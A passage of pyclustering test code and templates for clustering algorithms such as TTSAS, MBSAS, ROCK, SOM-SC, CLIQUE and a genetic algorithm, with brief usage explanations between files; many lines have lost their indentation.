        ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 1.0, 2.0, [10, 10], True)
        ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 10.0, 20.0, [20], True)
    def testTheSamePoints1(self):
        ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 1.0, 1.5, [5, 5, 5], True)
        ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 0.001, 0.002, [5, 5, 5], True)
        ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 1000, 2000, [15], True)
    def testTheSamePoints2(self):
        ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 1.0, 2.0, [10, 20], True)
        ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 10.0, 20.0, [30], True)
def testProcessingWhenLibraryCoreRemoved(self):
self.runRemovedLibraryCoreTest()
@remove_library
def runRemovedLibraryCoreTest(self):
ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1.0, 2.0, [5, 5], True)
```
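The threshold pairs above are easier to read with the algorithm's contract in mind: points closer than the first threshold to an existing cluster join it, and points farther than the second start a new one. A minimal sketch with illustrative data, using the same keyword style as the tests:
```python
from pyclustering.cluster.ttsas import ttsas
from pyclustering.utils.metric import type_metric, distance_metric

data = [[0.1], [0.2], [0.15], [5.0], [5.1], [5.2]]

# threshold1=1.0 merges the nearby points, threshold2=2.0 forces the
# distant group into a separate cluster; ccore=False runs pure Python.
ttsas_instance = ttsas(data, 1.0, 2.0, ccore=False,
                       metric=distance_metric(type_metric.EUCLIDEAN))
ttsas_instance.process()
print(ttsas_instance.get_clusters())  # expected: [[0, 1, 2], [3, 4, 5]]
```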
#### File: cluster/tests/mbsas_templates.py
```python
import matplotlib
matplotlib.use('Agg')
from pyclustering.tests.assertion import assertion
from pyclustering.cluster.mbsas import mbsas
from pyclustering.utils import read_sample
from pyclustering.utils.metric import type_metric, distance_metric
class mbsas_test_template:
    @staticmethod
    def clustering(path, amount, threshold, expected, ccore, **kwargs):
        metric = kwargs.get('metric', distance_metric(type_metric.EUCLIDEAN))
        sample = read_sample(path)
        mbsas_instance = mbsas(sample, amount, threshold, ccore=ccore, metric=metric)
        mbsas_instance.process()
        clusters = mbsas_instance.get_clusters()
        representatives = mbsas_instance.get_representatives()
        obtained_length = 0
        obtained_cluster_length = []
        for cluster in clusters:
            obtained_length += len(cluster)
            obtained_cluster_length.append(len(cluster))
        assertion.eq(len(sample), obtained_length)
        assertion.eq(len(expected), len(clusters))
        assertion.eq(len(expected), len(representatives))
        assertion.ge(amount, len(clusters))
        dimension = len(sample[0])
        for rep in representatives:
            assertion.eq(dimension, len(rep))
        expected.sort()
        obtained_cluster_length.sort()
        assertion.eq(expected, obtained_cluster_length)
```
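A direct MBSAS call, outside the template, looks as follows; the positional order (data, maximum number of clusters, dissimilarity threshold) matches the constructor call inside `clustering` above, and the data is illustrative:
```python
from pyclustering.cluster.mbsas import mbsas

data = [[0.0], [0.1], [0.2], [9.0], [9.1], [9.2]]

# At most 2 clusters; a point farther than 1.0 from every existing
# representative may seed a new cluster during the first pass.
mbsas_instance = mbsas(data, 2, 1.0, ccore=False)
mbsas_instance.process()
print(mbsas_instance.get_clusters())         # e.g. [[0, 1, 2], [3, 4, 5]]
print(mbsas_instance.get_representatives())  # one representative per cluster
```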
#### File: cluster/tests/rock_templates.py
```python
from pyclustering.cluster.rock import rock
from pyclustering.utils import read_sample
from random import random
class RockTestTemplates:
    @staticmethod
    def templateLengthProcessData(path_to_file, radius, cluster_numbers, threshold, expected_cluster_length, ccore):
        sample = read_sample(path_to_file)
        rock_instance = rock(sample, radius, cluster_numbers, threshold, ccore)
        rock_instance.process()
        clusters = rock_instance.get_clusters()
        length = sum([len(cluster) for cluster in clusters])
        assert len(sample) == length
        obtained_cluster_sizes = [len(cluster) for cluster in clusters]
        obtained_cluster_sizes.sort()
        expected_cluster_length.sort()
        assert obtained_cluster_sizes == expected_cluster_length
    @staticmethod
    def templateClusterAllocationOneDimensionData(ccore_flag):
        input_data = [[random()] for i in range(10)] + [[random() + 3] for i in range(10)] + \
                     [[random() + 5] for i in range(10)] + [[random() + 8] for i in range(10)]
        rock_instance = rock(input_data, 1, 4, 0.5, ccore_flag)
        rock_instance.process()
        clusters = rock_instance.get_clusters()
        assert len(clusters) == 4
        for cluster in clusters:
            assert len(cluster) == 10
```
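The template takes ROCK's parameters in the same order as the constructor; a self-contained sketch with illustrative values:
```python
from pyclustering.cluster.rock import rock

data = [[0.0, 0.0], [0.1, 0.1], [0.2, 0.0],
        [3.0, 3.0], [3.1, 3.1], [3.0, 3.2]]

# Connectivity radius 1.0 links only points within each group; the
# algorithm merges until 2 clusters remain (link threshold 0.5).
rock_instance = rock(data, 1.0, 2, 0.5, False)
rock_instance.process()
print(rock_instance.get_clusters())  # expected: [[0, 1, 2], [3, 4, 5]]
```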
#### File: cluster/tests/somsc_templates.py
```python
import numpy
import unittest
from pyclustering.cluster.somsc import somsc
from pyclustering.utils import read_sample
from random import random
class SyncnetTestTemplates(unittest.TestCase):
def templateLengthProcessData(self, path_to_file, amount_clusters, expected_cluster_length, ccore):
sample = read_sample(path_to_file)
somsc_instance = somsc(sample, amount_clusters, 100, ccore)
somsc_instance.process()
clusters = somsc_instance.get_clusters()
obtained_cluster_sizes = [len(cluster) for cluster in clusters]
self.assertEqual(len(sample), sum(obtained_cluster_sizes))
if expected_cluster_length is not None:
obtained_cluster_sizes.sort()
expected_cluster_length.sort()
            self.assertEqual(obtained_cluster_sizes, expected_cluster_length)
def templateClusterAllocationOneDimensionData(self, ccore_flag):
input_data = [[random()] for i in range(10)] + [[random() + 3] for i in range(10)] + \
[[random() + 5] for i in range(10)] + [[random() + 8] for i in range(10)]
somsc_instance = somsc(input_data, 4, 100, ccore_flag)
somsc_instance.process()
clusters = somsc_instance.get_clusters()
self.assertEqual(len(clusters), 4)
for cluster in clusters:
self.assertEqual(len(cluster), 10)
def predict(self, path_to_file, amount_clusters, points, expected_closest_clusters, ccore):
sample = read_sample(path_to_file)
somsc_instance = somsc(sample, amount_clusters, 100, ccore)
somsc_instance.process()
closest_clusters = somsc_instance.predict(points)
self.assertEqual(len(expected_closest_clusters), len(closest_clusters))
self.assertTrue(numpy.array_equal(numpy.array(expected_closest_clusters), closest_clusters))
```
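Despite its name, the template class above drives SOM-SC, not Syncnet. A minimal direct call with the same positional order (data, cluster count, training epochs, ccore flag) and illustrative data:
```python
from pyclustering.cluster.somsc import somsc

data = [[0.0], [0.2], [0.4], [5.0], [5.2], [5.4]]

somsc_instance = somsc(data, 2, 100, False)  # 2 clusters, 100 epochs, pure Python
somsc_instance.process()
print(somsc_instance.get_clusters())
print(somsc_instance.predict([[0.1], [5.1]]))  # index of the closest cluster per point
```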
#### File: tests/unit/__init__.py
```python
import unittest
from pyclustering.tests.suite_holder import suite_holder
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.cluster.tests.unit import ut_agglomerative as cluster_agglomerative_unit_tests
from pyclustering.cluster.tests.unit import ut_bang as cluster_bang_unit_tests
from pyclustering.cluster.tests.unit import ut_birch as cluster_birch_unit_tests
from pyclustering.cluster.tests.unit import ut_bsas as cluster_bsas_unit_tests
from pyclustering.cluster.tests.unit import ut_center_initializer as cluster_center_initializer_unit_tests
from pyclustering.cluster.tests.unit import ut_clarans as cluster_clarans_unit_tests
from pyclustering.cluster.tests.unit import ut_clique as cluster_clique_unit_tests
from pyclustering.cluster.tests.unit import ut_cure as cluster_cure_unit_tests
from pyclustering.cluster.tests.unit import ut_dbscan as cluster_dbscan_unit_tests
from pyclustering.cluster.tests.unit import ut_elbow as cluster_elbow_unit_tests
from pyclustering.cluster.tests.unit import ut_ema as cluster_ema_unit_tests
from pyclustering.cluster.tests.unit import ut_encoder as cluster_encoder_unit_tests
from pyclustering.cluster.tests.unit import ut_fcm as cluster_fcm_unit_tests
from pyclustering.cluster.tests.unit import ut_ga as cluster_ga_unit_tests
from pyclustering.cluster.tests.unit import ut_general as cluster_general_unit_tests
from pyclustering.cluster.tests.unit import ut_generator as cluster_generator_unit_tests
from pyclustering.cluster.tests.unit import ut_gmeans as cluster_gmeans_unit_tests
from pyclustering.cluster.tests.unit import ut_hsyncnet as cluster_hsyncnet_unit_tests
from pyclustering.cluster.tests.unit import ut_kmeans as cluster_kmeans_unit_tests
from pyclustering.cluster.tests.unit import ut_kmedians as cluster_kmedians_unit_tests
from pyclustering.cluster.tests.unit import ut_kmedoids as cluster_kmedoids_unit_tests
from pyclustering.cluster.tests.unit import ut_mbsas as cluster_mbsas_unit_tests
from pyclustering.cluster.tests.unit import ut_optics as cluster_optics_unit_tests
from pyclustering.cluster.tests.unit import ut_rock as cluster_rock_unit_tests
from pyclustering.cluster.tests.unit import ut_silhouette as cluster_silhouette_unit_tests
from pyclustering.cluster.tests.unit import ut_somsc as cluster_somsc_unit_tests
from pyclustering.cluster.tests.unit import ut_syncnet as cluster_syncnet_unit_tests
from pyclustering.cluster.tests.unit import ut_syncsom as cluster_syncsom_unit_tests
from pyclustering.cluster.tests.unit import ut_ttsas as cluster_ttsas_unit_tests
from pyclustering.cluster.tests.unit import ut_visualizer as cluster_visualizer_unit_tests
from pyclustering.cluster.tests.unit import ut_xmeans as cluster_xmeans_unit_tests
class clustering_unit_tests(suite_holder):
def __init__(self):
super().__init__()
self.fill_suite(self.get_suite())
@staticmethod
def fill_suite(unit_cluster_suite):
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_agglomerative_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_bang_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_birch_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_bsas_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_center_initializer_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_clarans_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_clique_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_cure_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_dbscan_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_elbow_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_ema_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_encoder_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_fcm_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_ga_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_general_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_generator_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_gmeans_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_hsyncnet_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_kmeans_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_kmedians_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_kmedoids_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_mbsas_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_optics_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_rock_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_silhouette_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_somsc_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_syncnet_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_syncsom_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_ttsas_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_visualizer_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_xmeans_unit_tests))
```
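Since `fill_suite` is a static method that populates any `TestSuite` passed to it, the aggregated suite can be run directly with the standard library runner (assuming the package layout implied by the import paths above):
```python
import unittest
from pyclustering.cluster.tests.unit import clustering_unit_tests

# Build the aggregated suite and run it with the standard runner.
suite = unittest.TestSuite()
clustering_unit_tests.fill_suite(suite)
unittest.TextTestRunner(verbosity=1).run(suite)
```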
#### File: tests/unit/ut_clique.py
```python
import unittest
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.cluster.clique import clique_block
from pyclustering.cluster.tests.clique_templates import clique_test_template
from pyclustering.tests.assertion import assertion
from pyclustering.samples.definitions import SIMPLE_SAMPLES, FCPS_SAMPLES
class clique_unit_test(unittest.TestCase):
def test_clustering_sample_simple_1(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 8, 0, [5, 5], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 7, 0, [5, 5], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 6, 0, [5, 5], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 5, 0, [5, 5], 0, False)
def test_clustering_sample_simple_1_one_cluster(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, 0, [10], 0, False)
    def test_clustering_diagonal_blocks_arent_neighbors(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 0, [5, 5], 0, False)
def test_clustering_sample_simple_1_noise_only(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 6, 1000, [], 10, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 6, 10, [], 10, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 5, [], 10, False)
def test_clustering_sample_simple_2(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 7, 0, [5, 8, 10], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 6, 0, [5, 8, 10], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 1, 0, [23], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 6, 500, [], 23, False)
def test_clustering_sample_simple_3(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 9, 0, [10, 10, 10, 30], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 8, 0, [10, 10, 10, 30], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 1, 0, [60], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 6, 500, [], 60, False)
def test_clustering_sample_simple_3_one_point_noise(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 2, 9, [59], 1, False)
def test_clustering_sample_simple_4_one_cluster(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, 1, 0, [75], 0, False)
def test_clustering_sample_simple_5(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 8, 0, [15, 15, 15, 15], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 7, 0, [15, 15, 15, 15], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 6, 0, [15, 15, 15, 15], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 5, 0, [15, 15, 15, 15], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 1, 0, [60], 0, False)
def test_clustering_one_dimensional_data1(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 4, 0, [10, 10], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 2, 0, [20], 0, False)
def test_clustering_one_dimensional_data2(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, 15, 0, [15, 20, 30, 80], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, 2, 0, [145], 0, False)
def test_clustering_one_dimensional_data_3_similar(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 7, 0, [10, 20], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 2, 0, [30], 0, False)
def test_clustering_sample_simple_10(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, 8, 0, [11, 11, 11], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, 7, 0, [11, 11, 11], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, 2, 0, [33], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, 1, 0, [33], 0, False)
def test_clustering_three_dimensional_data1(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 6, 0, [10, 10], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 5, 0, [10, 10], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 1, 0, [20], 0, False)
def test_clustering_similar_points(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 8, 0, [5, 5, 5], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 7, 0, [5, 5, 5], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 5, 0, [5, 5, 5], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 2, 0, [15], 0, False)
def test_clustering_zero_column(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE13, 3, 0, [5, 5], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE13, 2, 0, [5, 5], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE13, 1, 0, [10], 0, False)
def test_clustering_fcps_lsun(self):
clique_test_template.clustering(FCPS_SAMPLES.SAMPLE_LSUN, 15, 0, [100, 101, 202], 0, False)
def test_clustering_fcps_hepta(self):
clique_test_template.clustering(FCPS_SAMPLES.SAMPLE_HEPTA, 9, 0, [30, 30, 30, 30, 30, 30, 32], 0, False)
def test_visualize_no_failure_one_dimensional(self):
clique_test_template.visualize(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 4, 0, False)
clique_test_template.visualize(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, 7, 0, False)
def test_visualize_no_failure_two_dimensional(self):
clique_test_template.visualize(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 8, 0, False)
clique_test_template.visualize(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, 0, False)
def test_visualize_no_failure_three_dimensional(self):
clique_test_template.visualize(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 3, 0, False)
def test_argument_invalid_levels(self):
clique_test_template.exception(ValueError, SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 0, 0.0, False)
clique_test_template.exception(ValueError, SIMPLE_SAMPLES.SAMPLE_SIMPLE1, -1, 0.0, False)
clique_test_template.exception(ValueError, SIMPLE_SAMPLES.SAMPLE_SIMPLE1, -10, 0.0, False)
def test_argument_invalid_density(self):
clique_test_template.exception(ValueError, SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, -1.0, False)
clique_test_template.exception(ValueError, SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, -2.0, False)
def test_argument_empty_data(self):
clique_test_template.exception(ValueError, [], 1, 0.0, False)
def test_logical_block_neighbors(self):
block = clique_block()
block.logical_location = [1, 1]
neighbors = block.get_location_neighbors(3)
assertion.eq(4, len(neighbors))
assertion.true([0, 1] in neighbors)
assertion.true([2, 1] in neighbors)
assertion.true([1, 0] in neighbors)
assertion.true([1, 2] in neighbors)
def test_logical_block_neighbors_on_edge(self):
block = clique_block()
block.logical_location = [1, 1]
neighbors = block.get_location_neighbors(2)
assertion.eq(2, len(neighbors))
assertion.true([0, 1] in neighbors)
assertion.true([1, 0] in neighbors)
block.logical_location = [0, 0]
neighbors = block.get_location_neighbors(2)
assertion.eq(2, len(neighbors))
assertion.true([0, 1] in neighbors)
assertion.true([1, 0] in neighbors)
```
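The last two tests above exercise the grid-cell helper on its own; the same neighbor query, runnable in isolation and using only the calls that appear in the tests:
```python
from pyclustering.cluster.clique import clique_block

block = clique_block()
block.logical_location = [0, 0]

# In a 3x3 logical grid the corner cell [0, 0] has exactly two
# axis-aligned neighbors: [1, 0] and [0, 1].
print(block.get_location_neighbors(3))
```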
#### File: tests/unit/ut_ga.py
```python
import unittest
import inspect
import numpy
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.samples.definitions import SIMPLE_SAMPLES
from pyclustering.cluster.ga import genetic_algorithm, ga_observer, ga_visualizer
from pyclustering.cluster.ga_maths import ga_math
from pyclustering.utils import read_sample
class GeneticAlgorithmClusteringUnitTest(unittest.TestCase):
def runGeneticAlgorithm(self, test_case_name, data, count_chromosomes, count_clusters, count_populations,
count_mutations_gen, result_should_be):
        _, best_ff = genetic_algorithm(data=data,
                                       count_clusters=count_clusters,
                                       chromosome_count=count_chromosomes,
                                       population_count=count_populations,
                                       count_mutation_gens=count_mutations_gen, random_state=1000).process()
# Check result
self.assertEqual(best_ff, result_should_be)
def test1CenterClustering(self):
data = [[0, 0], [0, 2]]
self.runGeneticAlgorithm(test_case_name=inspect.stack()[0][3],
data=data,
count_chromosomes=10,
count_clusters=1,
count_populations=10,
count_mutations_gen=1,
result_should_be=2.0)
def test1Center4DataClustering(self):
data = [[0, 0], [0, 2], [2, 0], [2, 2]]
self.runGeneticAlgorithm(test_case_name=inspect.stack()[0][3],
data=data,
count_chromosomes=10,
count_clusters=1,
count_populations=10,
count_mutations_gen=1,
result_should_be=8.0)
def test2Center8DataClustering(self):
data = [[0, 0], [0, 2], [2, 0], [2, 2]]
data.extend([[6, 0], [6, 2], [8, 0], [8, 2]])
self.runGeneticAlgorithm(test_case_name=inspect.stack()[0][3],
data=data,
count_chromosomes=50,
count_clusters=2,
count_populations=50,
count_mutations_gen=1,
result_should_be=16.0)
def test4Center16DataClustering(self):
data = []
data.extend([[0, 0], [1, 0], [0, 1], [1, 1]])
data.extend([[5, 0], [6, 0], [5, 1], [6, 1]])
data.extend([[0, 5], [1, 5], [0, 6], [1, 6]])
data.extend([[4, 4], [7, 4], [4, 7], [7, 7]])
self.runGeneticAlgorithm(test_case_name=inspect.stack()[0][3],
data=data,
count_chromosomes=20,
count_clusters=4,
count_populations=100,
count_mutations_gen=1,
result_should_be=24.0)
def templateDataClustering(self,
sample_path,
amount_clusters,
chromosome_count,
population_count,
count_mutation_gens,
coeff_mutation_count,
expected_clusters_sizes,
**kwargs):
scale_points = kwargs.get('scale_points', None)
sample = numpy.array(read_sample(sample_path))
if scale_points is not None:
sample = sample * scale_points
        ga_instance = genetic_algorithm(sample, amount_clusters, chromosome_count, population_count,
                                        count_mutation_gens=count_mutation_gens,
                                        coeff_mutation_count=coeff_mutation_count,
                                        **kwargs)
ga_instance.process()
clusters = ga_instance.get_clusters()
obtained_cluster_sizes = [len(cluster) for cluster in clusters]
self.assertEqual(len(sample), sum(obtained_cluster_sizes))
if expected_clusters_sizes is not None:
obtained_cluster_sizes.sort()
expected_clusters_sizes.sort()
self.assertEqual(obtained_cluster_sizes, expected_clusters_sizes)
def testClusteringTwoDimensionalData(self):
self.templateDataClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 20, 20, 2, 0.25, [5, 5], random_state=1000)
def testClusteringTwoDimensionalDataWrongAllocation(self):
self.templateDataClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, 20, 20, 2, 0.25, [10], random_state=1000)
def testClusteringNonNormalizedValues(self):
self.assertRaises(ValueError, self.templateDataClustering, SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 20, 20, 2, 0.25, [5, 5], random_state=1000, scale_points=1000)
def testClusteringSimple02(self):
self.templateDataClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 3, 20, 40, 2, 0.25, [5, 8, 10], random_state=1000)
def testClusteringSimple09(self):
self.templateDataClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 2, 20, 20, 2, 0.25, [10, 20], random_state=1000)
def testClusteringOneDimensionalData(self):
self.templateDataClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 2, 20, 20, 2, 0.25, [10, 10], random_state=1000)
def testClusteringOneDimensionalDataWrongAllocation(self):
self.templateDataClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 1, 20, 20, 2, 0.25, [20], random_state=1000)
def testClusteringThreeDimensionalData(self):
self.templateDataClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 2, 20, 20, 2, 0.25, [10, 10], random_state=1000)
def testClusteringThreeDimensionalDataWrongAllocation(self):
self.templateDataClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 1, 20, 20, 2, 0.25, [20], random_state=1000)
def testTwoClustersTotallySimilarObjects(self):
self.templateDataClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 2, 20, 20, 2, 0.25, None, random_state=1000)
def testFiveClustersTotallySimilarObjects(self):
self.templateDataClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 5, 20, 20, 2, 0.25, None, random_state=1000)
def testTenClustersTotallySimilarObjects(self):
self.templateDataClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 10, 20, 20, 2, 0.25, None, random_state=1000)
def templateTestObserverCollecting(self, amount_clusters, iterations, global_optimum, local_optimum, average, **kwargs):
observer_instance = ga_observer(global_optimum, local_optimum, average)
self.assertEqual(0, len(observer_instance))
sample = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1)
ga_instance = genetic_algorithm(sample, amount_clusters, 20, iterations, count_mutation_gens=2,
coeff_mutation_count=0.25, observer=observer_instance, **kwargs)
ga_instance.process()
self.assertEqual(observer_instance, ga_instance.get_observer())
expected_length = 0
if global_optimum is True:
expected_length = iterations + 1
self.assertEqual(expected_length, len(observer_instance))
self.assertEqual(expected_length, len(observer_instance.get_global_best()['chromosome']))
self.assertEqual(expected_length, len(observer_instance.get_global_best()['fitness_function']))
expected_length = 0
if local_optimum is True:
expected_length = iterations + 1
self.assertEqual(expected_length, len(observer_instance))
self.assertEqual(expected_length, len(observer_instance.get_population_best()['chromosome']))
self.assertEqual(expected_length, len(observer_instance.get_population_best()['fitness_function']))
expected_length = 0
if average is True:
expected_length = iterations + 1
self.assertEqual(expected_length, len(observer_instance))
self.assertEqual(expected_length, len(observer_instance.get_mean_fitness_function()))
if global_optimum is True:
clusters = ga_math.get_clusters_representation(observer_instance.get_global_best()['chromosome'][-1])
self.assertEqual(amount_clusters, len(clusters))
return sample, observer_instance
def testObserveGlobalOptimum(self):
self.templateTestObserverCollecting(2, 10, True, False, False, random_state=1000)
def testObserveLocalOptimum(self):
self.templateTestObserverCollecting(2, 11, False, True, False, random_state=1000)
def testObserveAverage(self):
self.templateTestObserverCollecting(2, 12, False, False, True, random_state=1000)
def testObserveAllParameters(self):
self.templateTestObserverCollecting(2, 9, True, True, True, random_state=1000)
def testObserveNoCollecting(self):
self.templateTestObserverCollecting(2, 9, False, False, False, random_state=1000)
def testObserveParameterCombinations(self):
self.templateTestObserverCollecting(3, 10, True, True, False, random_state=1000)
self.templateTestObserverCollecting(4, 10, True, False, True, random_state=1000)
self.templateTestObserverCollecting(1, 10, False, True, True, random_state=1000)
def testNoFailureVisualizationApi(self):
sample, observer = self.templateTestObserverCollecting(2, 10, True, True, True, random_state=1000)
figure, _ = ga_visualizer.show_evolution(observer)
ga_visualizer.close(figure)
ga_visualizer.show_clusters(sample, observer)
ga_visualizer.animate_cluster_allocation(sample, observer)
def testNoFailureShowEvolution(self):
_, observer = self.templateTestObserverCollecting(2, 10, True, True, True, random_state=1000)
figure, _ = ga_visualizer.show_evolution(observer, 2, 5)
ga_visualizer.close(figure)
figure, _ = ga_visualizer.show_evolution(observer, 2, len(observer))
ga_visualizer.close(figure)
figure, _ = ga_visualizer.show_evolution(observer, 2, len(observer), display=False)
ga_visualizer.close(figure)
def testNoneObserver(self):
sample = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1)
ga_instance = genetic_algorithm(sample, 2, 20, 20, count_mutation_gens=2,
coeff_mutation_count=0.25, observer=None)
ga_instance.process()
self.assertIsNone(ga_instance.get_observer())
def test_incorrect_data(self):
self.assertRaises(ValueError, genetic_algorithm, [], 1, 2, 2)
